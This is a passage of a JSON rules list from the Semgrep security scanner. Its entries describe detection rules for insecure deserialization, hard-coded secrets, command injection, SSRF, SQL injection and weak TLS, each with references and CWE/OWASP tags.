[https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","id":"python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","name":"python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password)\n - [https://docs.diesel.rs/master/diesel/index.html](https://docs.diesel.rs/master/diesel/index.html)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","id":"rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","name":"rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object."},"help":{"markdown":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop)\n - [https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n","text":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","id":"javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","name":"javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow."},"help":{"markdown":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes)\n - [https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/default_routes/index.markdown](https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/default_routes/index.markdown)\n","text":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","id":"ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","name":"ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","id":"ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","name":"ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this."},"help":{"markdown":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.no-send.bad-send)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_send.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_send.rb)\n - [https://the.igreque.info/posts/2016/01-object-send-considered-harmful-en.html](https://the.igreque.info/posts/2016/01-object-send-considered-harmful-en.html)\n","text":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.no-send.bad-send","id":"ruby.lang.security.no-send.bad-send","name":"ruby.lang.security.no-send.bad-send","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.no-send.bad-send"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'."},"help":{"markdown":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure)\n - [https://golang.org/doc/go1.14#crypto/tls](https://golang.org/doc/go1.14#crypto/tls)\n - [https://www.us-cert.gov/ncas/alerts/TA14-290A](https://www.us-cert.gov/ncas/alerts/TA14-290A)\n","text":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","id":"go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","name":"go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"help":{"markdown":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-expat.security.audit.expat-xxe.expat-xxe)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.node-expat.security.audit.expat-xxe.expat-xxe","id":"javascript.node-expat.security.audit.expat-xxe.expat-xxe","name":"javascript.node-expat.security.audit.expat-xxe.expat-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-expat.security.audit.expat-xxe.expat-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element."},"help":{"markdown":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled)\n - [https://stackoverflow.com/a/7442668](https://stackoverflow.com/a/7442668)\n","text":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","id":"java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","name":"java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","properties":{"precision":"very-high","tags":["CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences","LOW CONFIDENCE","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"help":{"markdown":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials)\n - [https://cwe.mitre.org/data/definitions/522.html](https://cwe.mitre.org/data/definitions/522.html)\n","text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","id":"ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","name":"ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true"},"help":{"markdown":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)\n","text":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true"},"helpUri":"https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","id":"typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","name":"typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","id":"ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","name":"ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","id":"python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","name":"python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","id":"python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","name":"python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","id":"csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","name":"csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","id":"java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","name":"java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"SendGrid API Key detected"},"help":{"markdown":"SendGrid API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"SendGrid API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","id":"generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","name":"generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","id":"csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","name":"csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme."},"help":{"markdown":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.insecure-redirect.insecure-redirect)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an insecure redirect in this nginx configuration. If 